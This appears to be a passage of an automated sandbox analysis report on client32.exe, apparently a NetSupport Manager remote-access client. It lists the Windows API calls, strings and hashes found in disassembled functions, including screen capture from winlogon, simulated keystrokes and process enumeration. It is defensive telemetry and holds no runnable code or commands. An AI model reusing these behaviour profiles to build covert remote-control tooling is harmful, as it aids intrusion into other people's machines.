                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Window$BringCurrentIconicShowThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4184413098-0
                                                                                                                • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                                • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                                                • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                                • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                                                APIs
                                                                                                                • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                                                • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ControlDevicekeybd_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 1421710848-0
                                                                                                                • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                                                • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                                                APIs
                                                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                                                • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                                                • GetDC.USER32(00000000), ref: 110B31E8
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                                                • GetTickCount.KERNEL32 ref: 110B323F
                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                                                • GetTickCount.KERNEL32 ref: 110B327F
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                                                • GdiFlush.GDI32 ref: 110B32A2
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                                                • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                                                • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                                                • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                                                • String ID: @L(t$Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                                                • API String ID: 2071925733-2690483780
                                                                                                                • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                                                • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                                                • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                                                • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,0BAD89F8,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                                                  • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,771B0BD0,00000000), ref: 11138283
                                                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                                                  • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                                                                • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                                                  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                                                                • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                                                                • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                                                                • API String ID: 348974188-2591373181
                                                                                                                • Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                                                • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                                                                • Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                                                • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                                                                APIs
                                                                                                                • _calloc.LIBCMT ref: 1104702F
                                                                                                                • wsprintfA.USER32 ref: 110470AE
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                • wsprintfA.USER32 ref: 110470E9
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                                                • _strrchr.LIBCMT ref: 1104720C
                                                                                                                • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                                                • _free.LIBCMT ref: 11047251
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                                                • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                                                • API String ID: 1757445300-1785190265
                                                                                                                • Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                                                                • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                                                • Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                                                                • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                                                • _free.LIBCMT ref: 1112131D
                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                • _free.LIBCMT ref: 11121333
                                                                                                                • _free.LIBCMT ref: 11121348
                                                                                                                • GdiFlush.GDI32(?,?,?,02AE8EB8), ref: 11121350
                                                                                                                • _free.LIBCMT ref: 1112135D
                                                                                                                • _free.LIBCMT ref: 11121371
                                                                                                                • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                                                • DeleteObject.GDI32(?), ref: 1112139A
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,02AE8EB8), ref: 111213A4
                                                                                                                • DeleteDC.GDI32(?), ref: 111213CB
                                                                                                                • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                                                • DeleteDC.GDI32(?), ref: 111213EB
                                                                                                                • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                                                                Strings
                                                                                                                • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                                • String ID: Error deleting membm, e=%d
                                                                                                                • API String ID: 3195047866-709490903
                                                                                                                • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                                • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                                                • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                                • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                                                • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                                                • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                • API String ID: 4172769820-2231854162
                                                                                                                • Opcode ID: 9029ec4f1e5ab3260b884abce1032d57b8f7010436834d86196a7f52dafc7713
                                                                                                                • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                                                • Opcode Fuzzy Hash: 9029ec4f1e5ab3260b884abce1032d57b8f7010436834d86196a7f52dafc7713
                                                                                                                • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(0000017D,0BAD89F8,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                                • _memset.LIBCMT ref: 1110F4C2
                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                                                • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                                                  • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                                                • _free.LIBCMT ref: 1110F628
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                                                • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                                                                • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,0BAD89F8,0000017D,00000001), ref: 1110F681
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                                                • String ID: End Record %s$PCIR
                                                                                                                • API String ID: 4278564793-2672865668
                                                                                                                • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                                • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                                                • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                                • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,0BAD89F8,1102E747,?,00000000), ref: 110F711B
                                                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                                                • wsprintfA.USER32 ref: 110F7235
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                                                • wsprintfA.USER32 ref: 110F7267
                                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
